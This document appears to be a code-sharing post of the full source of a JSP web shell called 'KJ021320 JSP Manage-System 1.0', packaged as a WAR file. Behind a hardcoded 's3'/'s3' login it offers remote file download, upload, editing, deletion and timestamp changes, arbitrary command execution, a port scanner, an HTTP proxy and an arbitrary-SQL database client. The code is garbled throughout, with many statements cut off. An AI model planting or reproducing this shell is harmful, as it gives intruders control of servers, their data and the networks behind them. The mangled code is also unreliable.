
通过 jar cvf aa.war .








ExpandedBlockStart.gif 代码
<% @page  import = " java.util.*,java.io.*,java.sql.*,java.util.zip.*,java.lang.reflect.*,java.net.*,javax.servlet.jsp.* " %>
<% @page pageEncoding = " gbk " %>
final  String APP_NAME = " KJ021320 JSP Manage-System 1.0 " ;
int  portListen = 5000 ; // set the httpproxy port
boolean  openHttpProxy = false ; // set the httpproxy load-on-start-up

// the main framwork
void  mainForm(String web_Site,JspWriter out) throws  Exception{
" <table width=100% height=100% border=0 bgcolor=menu> " );
" <tr><td height=30 colspan=2> " );
" <table width=100% height=25 border=0> " );
" <form name=address method=post target=FileFrame onSubmit='checkUrl();'> " );
" <tr><td width=60 align=center>FilePath:</td><td> " );
" <input name=FolderPath style=width:100% value=' " + web_Site + " ' οnchange='checkUrl();'> " );
" <input type=hidden name=Action value=F> " );
" <input type=hidden name=Filename> " );
" </td><td width=60 align=center><a href='javascript:checkUrl();'>GOtoLink</a> " );
" </td></tr></form></table></td></tr><tr><td width=148> " );
" <iframe name=Menu src=?Action=M width=100% height=100% frameborder=2 scrolling=yes></iframe></td> " );
" <td width=600> " );
" <iframe name=FileFrame src='?Action=F&FolderPath= " + web_Site + " ' width=100% height=100% frameborder=1 scrolling=yes></iframe> " );
" </td></tr></table> " );
// menu form to choose
void  mainMenu(JspWriter out,String web_Site) throws  Exception{
" <table> " );
" <tr><td bgcolor=Gray><a href=?Action=M> " + ico( 58 ) + " FileOperation(File.class)</a></td></tr> " );
" <tr><td bgcolor=menu οnclick=top.address.FolderPath.value=' " + folderReplace(web_Site) + " '><a href='?Action=F&FolderPath= " + web_Site + " ' target=FileFrame> " + ico( 48 ) + " WEB Folder</a></td></tr> " );
" <tr><td bgcolor=menu><a href=?Action=S target=FileFrame> " + ico( 53 ) + " SystemInfo(System.class)</a></td></tr> " );
" <tr><td bgcolor=menu><a href=?Action=L target=FileFrame> " + ico( 53 ) + " ServletInfo</a></td></tr> " );
" <tr><td bgcolor=menu><a href=?Action=T target=FileFrame> " + ico( 53 ) + " SystemTools</a></td></tr> " );
" <tr><td bgcolor=menu><a href=?Action=i target=FileFrame> " + ico( 57 ) + " Interfaces</a></td></tr> " );
" <tr><td bgcolor=menu><a href='http://blog.csdn.net/kj021320' target=FileFrame>About nonamed(kj021320)</a></td></tr> " );
" </table> " );
// show all files and folders
void  showFiles(JspWriter out,String path) throws  Exception{
    File file
= new  File(path);
long  maxSize = 0 ;
if (file.isDirectory() && file.exists()){
        File[] f
= file.listFiles();
" <table><tr bgcolor=menu><td>name</td><td>type</td><td>size</td><td>modify date</td><td>readonly</td><td>can write</td><td>hidden</td><td>Action</td></tr> " );
for ( int  i = 0 ;i < f.length;i ++ ){
= maxSize + f[i].length();
if (f[i].isDirectory())
" <tr bgcolor=menu><td><a href=\ " javascript:top.address.FolderPath.value = ' "+folderReplace(f[i].getAbsolutePath())+"/ ' ;checkUrl();\ " > " + ico( 48 ) + f[i].getName() + " </a></td><td> DIR </td><td> " + getSize(f[i].length()) + " </td><td> " + new  java.util.Date(f[i].lastModified()) + " </td><td> " + f[i].canRead() + " </td><td> " + f[i].canWrite() + " </td><td> " + f[i].isHidden() + " </td><td> " + fOperation( true ,f[i].getAbsolutePath()) + " </td></tr> " );
" <tr><td> " + ico( 50 ) + f[i].getName() + " </td><td> file </td><td> " + getSize(f[i].length()) + " </td><td> " + new  java.util.Date(f[i].lastModified()) + " </td><td> " + f[i].canRead() + " </td><td> " + f[i].canWrite() + " </td><td> " + f[i].isHidden() + " </td><td> " + fOperation( false ,f[i].getAbsolutePath()) + " </td></tr> " );
" </table> " );
" this folder size: " + getSize(maxSize));
// show the system information
void  showSystemInfo(JspWriter out) throws  Exception{
    Map map
= null ;
    Set set
= null ;
    Iterator it
= null ;

/* use for jdk1.5
    out.print("<hr>System Env info:<ul>");
        Object oName=it.next();
        out.println("<li>"+oName+" [ "+map.get(oName)+" ]");

= System.getProperties();
= map.keySet();
= set.iterator();
" <hr>System Property info:<ul> " );
while (it.hasNext()){
        Object oName
= it.next();
" <li> " + oName + "  [  " + map.get(oName) + "  ] " );
" </ul><hr>System CPU : " );
+ "  <br> " );
" the JVM Free Memory : " + getSize(Runtime.getRuntime().freeMemory()));
" <br>the JVM Max Memory : " + getSize(Runtime.getRuntime().maxMemory()));
// show servlet information
void  servletInfo(ServletConfig config,JspWriter out) throws  Exception{
    ServletContext sc
= config.getServletContext();
" Server info:  " + sc.getServerInfo() + " <br> " );
" ServletContext name:  " + sc.getServletContextName() + " <br> " );
" Major version : " + sc.getMajorVersion() + " <br> " );
" Minor version : " + sc.getMinorVersion() + " <br> " );
    Enumeration en
= sc.getInitParameterNames();
    String initInfo
= " init parameter: <br> " ;
while (en.hasMoreElements()){
        String name
= (String)en.nextElement();
= " key: " + name + "  value: " + sc.getInitParameter(name)  + " <br> " ;

// down the server file
void  downFile(String filename,HttpServletResponse res) throws  Exception{
int  w = 0 ;
byte [] buffer = new   byte [ 256 ];
byte [] b = ( new  File(filename)).getName().getBytes();
    String outFile
= new  String(b, " ISO-8859-1 " );
" Content-disposition " , " attachment;filename=\ "" +outFile+ " \ "" );
    ServletOutputStream sos
= res.getOutputStream();
    BufferedInputStream bis
= null ;
try {
= new  BufferedInputStream( new  FileInputStream(filename));
while ((w = bis.read(buffer, 0 ,buffer.length)) !=- 1 ){
0 ,w);
catch (Exception e){
finally {
if (bis != null )bis.close();
// delect file
void  deleteFile(String filename,JspWriter out) throws  Exception{
    File f
= new  File(filename);
if (f.exists()){
if (f.delete())out.print(filename + " delete success... " );
else {
" file not find!! " );
// rename the file
void  renameFile(String filename,JspWriter out) throws  Exception{
int  split = filename.indexOf( " | " );
    String newFilename
= filename.substring(split + 1 );
= filename.substring( 0 ,split);
    File f
= new  File(filename);
if (f.exists()){
if (f.renameTo( new  File(newFilename)))out.print(newFilename + "  file move success " );
else {
" file not find!! " );
// file copy
void  copyFile(String filename,JspWriter out) throws  Exception{
int  split = filename.indexOf( " | " );
    String newFilename
= filename.substring(split + 1 );
= filename.substring( 0 ,split);
    File f
= new  File(filename);
    BufferedInputStream bis
= null ;
    BufferedOutputStream bos
= null ;
if (f.exists()){
try {
= new  BufferedInputStream( new  FileInputStream(filename));
= new  BufferedOutputStream( new  FileOutputStream(newFilename));
int  s = 0 ;
while ((s = bis.read()) !=- 1 ){
catch (Exception e){
" file copy error " );
finally {
if (bis != null )bis.close();
if (bos != null )bos.close();
+ " file copy success " );
else {
" file not find!! " );
// file editor
void  editFile(String filename,JspWriter out) throws  IOException{
    File f
= new  File(filename);
" <form method=post>File Path: " );
" <input type=text size=80 name=filename value=' " + filename + " '> " );
" <input type=button name=kFile onClick='this.form.action=\ " ? Action = K\ " ;this.form.submit();' value=KeepFile > " );
" <input type=button onClick=editFile(this.form.filename.value); value=ReadFile> " );
" <textarea name=FileContent rows=35 style=width:100%;> " );
if (f.exists()){
try {
            BufferedReader br
= new  BufferedReader( new  InputStreamReader( new  FileInputStream(filename), " Gb2312 " ));
            String s
= "" ;
while ((s = br.readLine()) != null ){
catch (Exception e){
" file edit error " );
finally {
" </textarea></form> " );
// file save
void  saveFile(String filename, byte [] fileContent,JspWriter out) throws  IOException{
if (filename != null || fileContent != null ){
        BufferedOutputStream bos
= null ;
try {
= new  BufferedOutputStream( new  FileOutputStream(filename));
0 ,fileContent.length);
finally {
if (bos != null )bos.close();
+ " file save success " );
else {
" Error " );
// chang the file modify date
void  dateChange(String filename,String year,String month,String day,JspWriter out) throws  IOException{
    File f
= new  File(filename);
if (f.exists()){
        Calendar calendar
= Calendar.getInstance();
if (f.setLastModified(calendar.getTimeInMillis()))
+ " file date change success " );
+ " file date change error " );
else {
" file not find!!! " );
// run file
void  execFile(String file,JspWriter out) throws  Exception{
int  i = 0 ;
    Runtime rt
= Runtime.getRuntime();
    Process ps
= rt.exec(file);
    InputStreamReader isr 
=   null ;
char [] bufferC = new   char [ 1024 ];
try {
= new  InputStreamReader(ps.getInputStream(), " GB2312 " );
" <textarea rows=35 style=width:100%;> " );
while ((i = isr.read(bufferC, 0 ,bufferC.length)) !=- 1 ){
new  String(bufferC, 0 ,i)));
catch (Exception e){
" run file error " );
finally {
if (isr != null )isr.close();
" </textarea> " );
// zip zhe folder
void  zip(String zipPath, String srcPath,JspWriter out)  throws  Exception {
    FileOutputStream output 
=   null ;
    ZipOutputStream zipOutput 
=   null ;
try {
=   new  FileOutputStream(zipPath);
=   new  ZipOutputStream(output);
catch (Exception e){
" file zip error " );
finally {
if (zipOutput != null )zipOutput.close();
" zip ok " + zipPath);
// add the zip entry
void  zipEntry(ZipOutputStream zipOs, String initPath,String filePath,String zipPath)  throws  Exception {
    String entryName 
=  filePath;
    File f 
=   new  File(filePath);
if  (f.isDirectory()){ //  check is folder
        String[] files  =  f.list();
for ( int  i  =   0 ; i  <  files.length; i ++ )
            zipEntry(zipOs, initPath, filePath 
+  File.separator  +  files[i],zipPath);
return ;
    String chPh 
=  initPath.substring(initPath.lastIndexOf( " / " +   1 ); //  ?????
     int  idx = initPath.lastIndexOf(chPh);
if  (idx  !=   - 1 ) {
=  filePath.substring(idx);
    ZipEntry entry;
=   new  ZipEntry(entryName);
    File ff 
=   new  File(filePath);
if (ff.getAbsolutePath().equals(zipPath)) return ;
// the CRC efficacy
    entry.setCrc( 0 );
    CRC32 crc 
=   new  CRC32();
int  len  =   0 ;
byte [] buffer  =   new   byte [ 2048 ];
int  bufferLen  =   2048 ;
    FileInputStream input 
= null ;
try {
=   new  FileInputStream(filePath);
while  ((len  =  input.read(buffer,  0 , bufferLen))  !=   - 1 ) {
0 , len);
0 , len);
catch (Exception e){
finally {
if (input != null )input.close();
// file upload to server
void  upfile(HttpServletRequest request,JspWriter out,String filename) throws  Exception{
        String boundary 
=  request.getContentType().substring( 30 ); // ?????
        ServletInputStream sis = request.getInputStream();
        BufferedOutputStream bos
= null ;
byte [] buffer  =   new   byte [ 1024 ];
int  line =- 1 ;
for ( int  i = 0 ;i < 5 ;i ++ ){
= readLine(buffer,sis,boundary);
try {
= new  BufferedOutputStream( new  FileOutputStream(filename));
// read the filedata
             while (line !=- 1 ){
0 ,line);
= readLine(buffer,sis,boundary);
" upload success! " );
catch (Exception e){
" upload error " );
finally {
if (bos != null )bos.close();
int  readLine( byte [] lineByte,ServletInputStream servletInputstream,String endStr){
try {
int  len = 0 ;
= servletInputstream.readLine(lineByte, 0 ,lineByte.length);
        String str
= new  String(lineByte, 0 ,len);
if (str.indexOf(endStr) ==- 1 )
return  len;
return   - 1 ;
catch (Exception _ex){
return   - 1 ;
// create folder
void  newFolder(JspWriter out,String foldername) throws  Exception{
    File f
= new  File(foldername);
if (f.mkdirs()){
" the folder create success! " );
else {
" the folder create error " );
// reflect java API classes
void  reflectAPI(JspWriter out,String className) throws  Exception{
    Class cls
= Class.forName(className);
    String constructor
= "" ;
    String ifString
= "" ;
    Class[] interfaces
= cls.getInterfaces();
    String supperClass
= cls.getSuperclass().toString();
    Constructor[] c
= cls.getDeclaredConstructors();
    Field[] f
= cls.getDeclaredFields();
    Method[] m
= cls.getDeclaredMethods();

for ( int  i = 0 ;i < interfaces.length;i ++ ){
= ifString + interfaces[i].getName() + " , " ;
" <strong> " + Modifier.toString(cls.getModifiers()) + " </strong>  " + cls + " <br><strong>extends</strong>  " + supperClass + "  <strong><br>implemets</strong>  " + ifString);

" <br>{<br><EM>Constructor:</EM><br> " );
for ( int  i = 0 ;i < c.length;i ++ )
" &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; " + c[i] + " <br> " );
" <EM>Field:</EM><br> " );
for ( int  i = 0 ;i < f.length;i ++ )
" &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; " + f[i] + " <br> " );
" <EM>Function:</EM><br> " );
for ( int  i = 0 ;i < m.length;i ++ )
" &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; " + m[i] + " <br> " );
" <br>} " );
// scan the remote server port
void  scanPort(JspWriter out,String strAddress, int  startPort, int  endPort) throws  Exception{
if (endPort < startPort || startPort <= 0 || startPort > 65535 || endPort > 65535 || endPort <= 0 ){
" port setup error " );
return ;
    InetAddress ia
= InetAddress.getByName(strAddress);
for ( int  p = startPort;p <= endPort;p += 15 ){
new  ScanPort(ia,p,p + 14 ,out)).start();
int )(endPort / startPort) * 5000 );
// scan port class
class  ScanPort  extends  Thread{
int  startPort;
int  endPort;
    InetAddress address;
    javax.servlet.jsp.JspWriter out;
public  ScanPort(InetAddress address, int  startPort, int  endPort,JspWriter out){
this .address = address;
this .startPort = startPort;
this .endPort = endPort;
this .out = out;
public   void  run(){
       Socket s
= null ;
for ( int  port = startPort;port <= endPort;port ++ ){
try {
= new  Socket(address,port);
" port  " + port + "  is Open<br> " );
catch (IOException e){
finally {
try {s.close();} catch (Exception e){}
public   void  switchProxyService(JspWriter out) throws  Exception{
if (openHttpProxy =! openHttpProxy){ // open the proxy
   new  RunProxyService(portListen).start();
" Proxy running " );
else {
" Proxy closed " );
// open httpProxy service
public   class  RunProxyService  extends  Thread{
int  port;
public  RunProxyService( int  port){
this .port = port;
public   void  run(){
try  {
   ServerSocket ss
= new  ServerSocket( 5000 );
while ( true ){
if (openHttpProxy){
new  HttpProxy(ss.accept()).start();
else {
break ;
catch  (IOException e) {
// HttpProxy class
public   class  HttpProxy  extends  Thread{
private  Socket s;
public   int  timeOut = 10000 ;
public  HttpProxy(Socket s){
this .s = s;
public  HttpProxy(Socket s, int  timeOut){
this .s = s;
this .timeOut = timeOut; // set the connection timeout
public   void  run(){
byte [] bit = new   byte [ 1024 ];
int  readBit = 0 ;
int  size = 0 ;
  String returnAddress
= null ; // return to the address
   int  returnPort  =   0 // return to the port
  String sendHostName = null ;
int  sendPort = 0 ;
  Socket sendSocket
= null ;
  OutputStream os
= null ;
  InputStream is
= null ;
try {
int  split = 0 ;

= s.getInputStream();
// get the http head information
    if ((size = is.read(bit,  0 , bit.length)) ==- 1 ) return ;

   String httpHead
= new  String(bit, 0 ,size);
= httpHead.indexOf( " \nHost:  " ) + 7 ;
= httpHead.substring(split, httpHead.indexOf( " \n " , split));
// get the hostname and port
    if ((split = sendHostName.indexOf( ' : ' )) !=- 1 ){
= Integer.parseInt(sendHostName.substring(split + 1 ).trim());
= sendHostName.substring( 0 ,split);
= new  Socket(sendHostName.trim(),sendPort);
else {
= new  Socket(sendHostName.trim(), 80 );
// send user headhttp
   os = sendSocket.getOutputStream();
// send user datas
    if (size == bit.length)
while ((size = is.read(bit,  0 , bit.length)) !=- 1 ){
0  , size);
// get WEBSITE html   and  user browser's output
   is = sendSocket.getInputStream();
= s.getOutputStream();

while ((size = is.read(bit,  0 , bit.length)) !=- 1 ){
0  , size);
catch (SocketException se){
catch  (IOException ie) {
catch  (Exception e) {
finally {
// close the stream
    if (is != null ){
try  {
catch  (IOException e) {
if (os != null ){
try  {
catch  (IOException e) {
// connection to the database
void  ConnectionDBM(JspWriter out,String driver,String url,String userName,String passWord,String sqlAction,String sqlCmd) throws  Exception{
 DBM dbm
= new  DBM(driver,url,userName,passWord,out);
if (sqlAction.equals( " LDB " )){
else {
// database manager class
class  DBM{
private  JspWriter out;
private  Connection con;
private  Statement stmt;
private  ResultSet rs;
public  DBM(String driverName,String url,String userName,String passWord,JspWriter out) throws  Exception{
this .out = out;
= DriverManager.getConnection(url,userName,passWord);
public   void  lookInfo() throws  Exception{
     DatabaseMetaData dbmd
= con.getMetaData();
     String tableType
= null ;
" <strong>DataBaseInfo</strong><table> " );
" <tr><td>DataBaseName:</td><td> " + dbmd.getDatabaseProductName() + " </td></tr> " );
" <tr><td>DataBaseVersion:</td><td> " + dbmd.getDatabaseProductVersion() + " </td></tr> " );
" <tr><td>the Numeric Function:</td><td> " + dbmd.getNumericFunctions() + " </td></tr> " );
" <tr><td>the String Function:</td><td> " + dbmd.getStringFunctions() + " </td></tr> " );
" <tr><td>the TimeDate Function:</td><td> " + dbmd.getTimeDateFunctions() + " </td></tr> " );
" <tr><td>the System Function:</td><td> " + dbmd.getSystemFunctions() + " </td></tr> " );
" </table> " );
" <strong>ProcedureInfo</strong><table> " );
try {
null , null , null ));
catch (Exception proE){}

// show  all the tables
      try {
= dbmd.getTables( null , null , null , null );
catch (Exception tabE){}
" <strong>DataBase Tables Info</strong><br> " );
while (rs.next()){
= rs.getString( 4 );
" <strong>TableName:</strong> " + rs.getString( 3 ) + "  <strong>Type:</strong> " + tableType + " <br> " );
if (tableType.indexOf( " VIEW " ) >= 0 || tableType.indexOf( " TABLE " ) >= 0 ){
try {
null , null ,rs.getString( 3 ), null ));
catch (Exception columnE){}
this .closeAll();
// show the column information
     private   void  getTableDetail(ResultSet tableRs) throws  Exception{
" <table border=1><tr><td>COLUMN_NAME</td><td>DATA_TYPE</td><td>TYPE_NAME</td><td>COLUMN_SIZE</td><td>IS_NULLABLE</td><td>CHAR_OCTET_LENGTH</td></tr> " );
while (tableRs.next()){
" <tr><td> " + tableRs.getString( 4 ) + " </td><td> " + tableRs.getInt( 5 ) + " </td><td> " + tableRs.getString( 6 ) + " </td><td> " + tableRs.getInt( 7 ) + " </td><td> " + tableRs.getString( 18 ) + " </td><td> " + tableRs.getInt( 16 ) + " </td></tr> " );
" </table> " );
// show all the procedures
     private   void  getProcedureDetail(ResultSet procRs) throws  Exception{
" <table border=1><tr><td>PROCEDURE_NAME</td><td>REMARKS</td><td>PROCEDURE_TYPE</td></tr> " );
while (procRs.next()){
" <tr><td> " + procRs.getString( 3 ) + " </td><td> " + procRs.getString( 7 ) + " </td><td> " + procRs.getShort( 8 ) + " </td></tr> " );
" </table> " );
// run the sql command
     public   void  executeSQL(String sqlCmd) throws  Exception{
= con.createStatement();
if (sqlCmd.trim().toLowerCase().startsWith( " select " )){
= stmt.executeQuery(sqlCmd);
      ResultSetMetaData rsmd
= rs.getMetaData();
int  ColumnCount = rsmd.getColumnCount();
" <table border=1><tr> " );
for ( int  i = 1 ;i <= ColumnCount;i ++ ){
" <td> " + rsmd.getColumnName(i) + " </td> " );
" </tr> " );
while (rs.next()){
" </tr> " );
for ( int  i = 1 ;i <= ColumnCount;i ++ ){
" <td> " + rs.getString(i) + " </td> " );
" </tr> " );
else {
" execute success " );

// close all the resource
     public   void  closeAll() throws  SQLException{
try {
if (rs != null )rs.close();
catch (Exception e){
try {
if (stmt != null )stmt.close();
catch (Exception e){
try {
if (con != null )con.close();
catch (Exception e){
// the other tools
void  systemTools(JspWriter out) throws  Exception{
" <table border=1> " );
" <tr><form method=post action='?Action=run'><td bordercolorlight=Black bgcolor=menu>System class run</td> " );
" <td colspan=2>filepath:<input name=execFile size=75 type=text title='example d:\\cmd.exe /c dir c:'></td><td><input name=go type=submit value=run></td></form></tr> " );
" <tr><form method=post enctype=\ " multipart / form - data\ "  action='?Action=Upfile'><td bordercolorlight=Black bgcolor=menu>file upload</td> " );
" <td colspan=2>file:<input name=file type=file>up to file<input title='d:\\1.txt' name=UPaddress size=35 type=text></td><td><input name=up οnclick=\ " this .form.action += ' &UPaddress= ' + this .form.UPaddress.value;\ "  type=submit value=upl></td></form></tr> " );
" <tr><form method=post action='?Action=EditFile'><td bordercolorlight=Black bgcolor=menu>new file</td><td colspan=2>file full name:<input name=Filename type=text size=50></td><td><input name=submit type=submit value=new></td> " );
" </form></tr> " );
" <tr><form method=post action='?Action=newFolder'><td bordercolorlight=Black bgcolor=menu>Create folder</td><td colspan=2>folder fullname:<input name=Filename type=text size=50></td><td><input name=submit type=submit value=new></td> " );
" </form></tr> " );
" <tr><form method=post action='?Action=APIreflect'><td bordercolorlight=Black bgcolor=menu>Reflect API</td><td colspan=2>Class Name:<input name=Filename title=java.lang.String type=text size=50></td><td><input name=submit type=submit value=ref></td> " );
" </form></tr> " );
" <tr><form method=post action='?Action=IPscan'><td bordercolorlight=Black bgcolor=menu>Scan Port</td><td>IP:<input name=IPaddress type=text size=20></td><td>Start Port:<input name=startPort title=1-65535 type=text size=5>End Port:<input name=endPort title=1-65535 type=text size=5></td><td><input name=submit type=submit value=sca></td> " );
" </form></tr> " );
" <tr><form method=post action='?Action=sql'> " );
" <td bordercolorlight=Black bgcolor=menu>DBM " );
" <select name=DB onChange='setDataBase(this.form);'><option>Sybase</option><option>Mssql</option><option>Mysql</option><option>Oracle</option><option>DB2</option><option>PostgreSQL</option></select></td><td> " );
" Driver:<input name=driver type=text>URL:<input name=conUrl type=text>user:<input name=user type=text size=3>password:<input name=password type=text size=3></td> " );
" <td>SqlCmd:<input type=text name=sqlcmd title='select * from admin'><input name=run type=submit value=Exec></td> " );
" <td><input name=run type=submit value=LDB></td> " );
" </form></tr> " );
if ( ! openHttpProxy){
" <tr><td><a href='?Action=HttpProxy' target=FileFrame>OpenTheHttpProxy</a></td></tr> " );
else {
" <tr><td><a href='?Action=HttpProxy' target=FileFrame>CloseTheHttpProxy</a></td></tr> " );
" </table> " );
// user interfaces========================== //
void  userInterFaces(JspWriter out) throws  Exception{
" if u want to add an function ,u can coding in 'userInterFaces'function " );

// ========================================= //

String encodeChange(String str)
throws  Exception{
if (str == null )
return   null ;
return   new  String(str.getBytes( " ISO-8859-1 " ), " gb2312 " );
String folderReplace(String folder){
return  folder.replace( ' \\ ' , ' / ' );
String fOperation(
boolean  f,String file){
if (f)
return   " <a href=\ " javascript:delFile( ' "+folderReplace(file)+" ' )\ " >Delete</a> <a href=\ " javascript:reName( ' "+folderReplace(file)+" ' )\ " >Rename</a> <a href=\ " javascript:setDate( ' "+folderReplace(file)+" ' )\ " >setDate</a> <a href=\ " javascript:zipFile( ' "+folderReplace(file)+" ' )\ " >Zip</a> " ;
return   " <a href=\ " javascript:delFile( ' "+folderReplace(file)+" ' )\ " >Delete</a> <a href=\ " javascript:reName( ' "+folderReplace(file)+" ' )\ " >Rename</a> <a href=\ " javascript:setDate( ' "+folderReplace(file)+" ' )\ " >setDate</a> <a href=\ " javascript:copyFile( ' "+folderReplace(file)+" ' )\ " >Copy</a> <a href=\ " javascript:editFile( ' "+folderReplace(file)+" ' )\ " >Edit</a> <a href=\ " javascript:downFile( ' "+folderReplace(file)+" ' );\ " >Down</a> " ;
String getSize(
long  size){
if (size >= 1024 * 1024 * 1024 ){
return   new  Long(size / 1073741824L ) + " G " ;
else   if (size >= 1024 * 1024 ){
return   new  Long(size / 1048576L ) + " M " ;
else   if (size >= 1024 ){
return   new  Long(size / 1024 ) + " K " ;
return  size + " B " ;
String ico(
int  num){ // ico
     return   " <font face=wingdings size=3>&# " + num + " </font> " ;
String htmlEntity(String htmlCode){
 StringBuffer sb
= new  StringBuffer();
char  c = 0 ;
for ( int  i = 0 ;i < htmlCode.length();i ++ ){
= htmlCode.charAt(i);
if (c == ' < ' )sb.append( " &lt; " );
else   if (c == ' > ' )sb.append( " &gt; " );
else   if (c == '   ' )sb.append( " &nbsp; " );
else  sb.append(c);
return  sb.toString();
6000 );
final  String WEB_SITE = folderReplace(application.getRealPath( " / " ));
final  String URL = request.getRequestURI();
if (session.getAttribute( " ID " ) == null ){
//  the user and pass  field
        String username = " s3 " ;
        String password
= " s3 " ;
//  the user and pass  field

if (request.getParameter( " LName " ) != null && request.getParameter( " LPass " ) != null && request.getParameter( " LName " ).equals(username) && request.getParameter( " LPass " ).equals(password)){
" ID " , " 1 " );
else {
" <center style=font-size:12px><br><br> " + APP_NAME + " <br><br> "   +
" <form name=login method=post>username:<input name=LName type=text size=15><br> "   +
" password:<input name=LPass type=password size=15><br><input type=submit value=Login></form></center> " );
return ;

< html >
< head >
< meta http - equiv = Content - Type content = " text/html; charset=gb2312 " >
< title ><%= APP_NAME %></ title >
< style type = " text/css " >
- size: 12px;}
this .border = ' 1 ' , this .borderColorLight = ' Black ' , this .borderColorDark = ' White ' );}
- size:12px;}
- left:0px;margin - top:0px;margin - right:0px;margin - bottom:0px;}
- space:nowrap;}
- decoration:none;}
</ style >
< script >
= top.address;
    function downFile(file){
= file;
= " D " ;
    function checkUrl(){
= " F " ;
    function editFile(file){
= " E " ;
= file;
    function delFile(file){
= " R " ;
= file;
    function reName(file){
if ((Rname = prompt( " rename to? " ,file)) != "" && Rname != null ){
= " N " ;
= file + " | " + Rname;
    function copyFile(file){
if ((Rname = prompt( " copy to? " ,file)) != "" && Rname != null ){
= " P " ;
= file + " | " + Rname;
    function setDate(file){
" Change date:<br><form method='post' action='?Action=dateChange'> " );
" filename:<input name='Filename' type='text' size=60 readonly value=' " + file + " '><br> " );
" Year:<select name='year'> " );
for (i = 1970 ;i <= 2050 ;i ++ ){
" <option value= " + i + " > " + i + " </option> " );
" </select> " );
" Month:<select name='month'> " );
for (i = 1 ;i <= 12 ;i ++ ){
" <option value= " + i + " > " + i + " </option> " );
" </select> " );
" Day:<select name='day'> " );
for (i = 1 ;i <= 31 ;i ++ ){
" <option value= " + i + " > " + i + " </option> " );
" </select> " );
" <input name='Action' type='button' οnclick='top.address.Action.value=\ " d\ " ;this.form.submit();' value='dateChange'> " );
" <input name='cancel' οnclick='history.back();' type='button' value='Cancel'> " );
    function zipFile(file){
if ((zipF = prompt( " save to ? " ,file + " /down.zip " )) != "" && zipF != null ){
= " Z " ;
= file;
= zipF;
    function setDataBase(f){
= new  Array();
0 ] = " com.sybase.jdbc2.jdbc.SybDriver " ;
1 ] = " com.microsoft.jdbc.sqlserver.SQLServerDriver " ;
2 ] = " com.mysql.jdbc.Driver " ;
3 ] = " oracle.jdbc.driver.OracleDriver " ;
4 ] = " com.ibm.db2.jdbc.app.DB2Driver " ;
5 ] = " org.postgresql.Driver " ;
= new  Array();
0 ] = " jdbc:jtds:sybase://host:port/database " ;
1 ] = " jdbc:microsoft:sqlserver://host:port;DatabaseName= " ;
2 ] = " jdbc:mysql://host:port/database " ;
3 ] = " jdbc:oracle:thin:@host:port:database " ;
4 ] = " jdbc:db2://host:port/database " ;
5 ] = " jdbc:postgresql://host:port/database " ;

= driverName[f.DB.selectedIndex];
= conUrl[f.DB.selectedIndex];
</ script >
</ head >
< body >
    String Action
= request.getParameter( " Action " );
char  action = (Action == null ? " 0 " :Action).charAt( 0 );
try {
switch (action){
// each skill
             case   ' M ' :mainMenu(out,WEB_SITE); break ;
case   ' F ' :showFiles(out,encodeChange(request.getParameter( " FolderPath " ))); break ;
case   ' S ' :showSystemInfo(out); break ;
case   ' L ' :servletInfo(config,out); break ;
case   ' D ' :downFile(encodeChange(request.getParameter( " Filename " )),response); return ;
case   ' E ' :editFile(encodeChange(request.getParameter( " Filename " )),out); break ;
case   ' R ' :deleteFile(encodeChange(request.getParameter( " Filename " )),out); break ;
case   ' K ' :saveFile(encodeChange(request.getParameter( " filename " )),request.getParameter( " FileContent " ).getBytes( " ISO-8859-1 " ),out); break ;
case   ' N ' :renameFile(encodeChange(request.getParameter( " Filename " )),out); break ;
case   ' P ' :copyFile(encodeChange(request.getParameter( " Filename " )),out); break ;
case   ' d ' :dateChange(encodeChange(request.getParameter( " Filename " )),request.getParameter( " year " ),request.getParameter( " month " ),request.getParameter( " day " ),out); break ;
case   ' r ' :execFile(encodeChange(request.getParameter( " execFile " )),out); break ;
case   ' Z ' :zip(encodeChange(request.getParameter( " Filename " )),encodeChange(request.getParameter( " FolderPath " )),out); break ;
case   ' U ' :upfile(request,out,encodeChange(request.getParameter( " UPaddress " ))); break ;
case   ' n ' :newFolder(out,encodeChange(request.getParameter( " Filename " ))); break ;
case   ' A ' :reflectAPI(out,encodeChange(request.getParameter( " Filename " ))); break ;
case   ' I ' :scanPort(out,encodeChange(request.getParameter( " IPaddress " )),Integer.parseInt(request.getParameter( " startPort " )),Integer.parseInt(request.getParameter( " endPort " ))); break ;
case   ' s ' :ConnectionDBM(out,encodeChange(request.getParameter( " driver " )),encodeChange(request.getParameter( " conUrl " )),encodeChange(request.getParameter( " user " )),encodeChange(request.getParameter( " password " )),encodeChange(request.getParameter( " run " )),encodeChange(request.getParameter( " sqlcmd " ))); break ;
case   ' H ' :switchProxyService(out); break ;
case   ' i ' :userInterFaces(out); break ;
case   ' T ' :systemTools(out); break ;
default :
break ;
catch (Exception e){
" </body></html> " );





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